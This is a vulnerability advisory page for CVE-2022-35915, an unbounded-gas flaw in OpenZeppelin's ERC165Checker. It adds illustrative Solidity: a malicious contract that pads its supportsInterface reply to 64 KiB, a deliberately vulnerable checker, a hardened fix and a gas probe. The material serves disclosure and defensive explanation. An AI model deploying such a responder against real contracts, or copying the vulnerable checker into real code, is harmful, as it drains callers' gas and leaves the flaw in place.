CVE-2022-35915 – openzeppelin-eth
Package
Manager: npm
Name: openzeppelin-eth
Vulnerable Version: >=2.0.0 <=2.2.0
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
EPSS: 0.004 (percentile 0.59912)
Details
OpenZeppelin Contracts ERC165Checker unbounded gas consumption
Impact
The target contract of an EIP-165 `supportsInterface` query can cause unbounded gas consumption by returning a large amount of data, while it is generally assumed that this operation has a bounded cost.
Patches
The issue has been fixed in OpenZeppelin Contracts v4.7.2.
References
https://github.com/OpenZeppelin/openzeppelin-contracts/pull/3587
For more information
If you have any questions or comments about this advisory, or need assistance deploying a fix, email us at security@openzeppelin.com.
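The following Solidity is an added illustration of the failure mode described above; it is not code from this page, from the advisory, or from the OpenZeppelin repository. `BloatedResponder`, `VulnerableChecker`, `HardenedChecker`, `GasProbe`, the 64 KiB return size and the 30,000-gas stipend are all assumptions chosen for the example. The pattern it relies on is an EVM property: a callee pays for its own memory expansion out of the gas it was given, but a caller that does a high-level `staticcall` returning `bytes memory` copies the whole return buffer into its own memory, and that copy is charged to the caller outside the stipend. The hardened checker below is written to copy at most one word of return data, which is the property a fix needs; it is my reconstruction, not a claim about the library's exact code.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical contracts written for this advisory page; not OpenZeppelin code.

interface IERC165 {
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

/// Malicious EIP-165 target: answers every query with `true` but pads the
/// return data to 64 KiB (constructed size; it must fit the callee's stipend).
contract BloatedResponder is IERC165 {
    function supportsInterface(bytes4) external pure override returns (bool) {
        assembly {
            mstore(0x00, 1)        // first word decodes as `true`
            return(0x00, 0x10000)  // 64 KiB of return data instead of 32 bytes
        }
    }
}

/// Checker in the style the advisory warns about: the high-level staticcall
/// copies the entire return buffer into caller memory before decoding it.
library VulnerableChecker {
    function supportsERC165Interface(address account, bytes4 interfaceId) internal view returns (bool) {
        bytes memory encodedParams = abi.encodeWithSelector(IERC165.supportsInterface.selector, interfaceId);
        // The 30,000-gas stipend bounds the callee, not the caller's copy of `result`.
        (bool success, bytes memory result) = account.staticcall{gas: 30000}(encodedParams);
        if (result.length < 32) return false;
        return success && abi.decode(result, (bool));
    }
}

/// Hardened checker: asks the EVM to copy at most 32 bytes of return data into
/// scratch space and reads the answer from there, so oversized replies are
/// never copied into caller memory.
library HardenedChecker {
    function supportsERC165Interface(address account, bytes4 interfaceId) internal view returns (bool) {
        bytes memory encodedParams = abi.encodeWithSelector(IERC165.supportsInterface.selector, interfaceId);
        bool success;
        uint256 returnSize;
        uint256 returnValue;
        assembly {
            // staticcall(gas, target, inPtr, inLen, outPtr, outLen): outLen caps the copy at one word.
            success := staticcall(30000, account, add(encodedParams, 0x20), mload(encodedParams), 0x00, 0x20)
            returnSize := returndatasize()
            returnValue := mload(0x00)
        }
        // A well-formed `true` is a 32-byte word equal to 1; anything else is treated as "no".
        return success && returnSize >= 0x20 && returnValue == 1;
    }
}

/// Measures the gas each checker spends querying `target`; deploy BloatedResponder
/// and pass its address to see the difference.
contract GasProbe {
    function probe(address target) external view returns (uint256 vulnerableGas, uint256 hardenedGas) {
        bytes4 id = type(IERC165).interfaceId;

        uint256 g = gasleft();
        VulnerableChecker.supportsERC165Interface(target, id);
        vulnerableGas = g - gasleft();

        g = gasleft();
        HardenedChecker.supportsERC165Interface(target, id);
        hardenedGas = g - gasleft();
    }
}
```

The gap `GasProbe.probe` reports is modest when the probe runs with an otherwise empty memory, because EVM memory expansion cost grows quadratically with the total memory already in use. The same 64 KiB copy becomes far more expensive inside a caller that already holds a large buffer, which is why a hostile `supportsInterface` target can drive the caller's cost well beyond the stipend it thought it was spending.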
Metadata
Created: 2022-08-14T00:23:34Z
Modified: 2022-08-14T00:23:34Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-7grf-83vw-6f5x/GHSA-7grf-83vw-6f5x.json
CWE IDs: ["CWE-400", "CWE-770"]
Alternative ID: GHSA-7grf-83vw-6f5x
Finding: F067
Auto approve: 1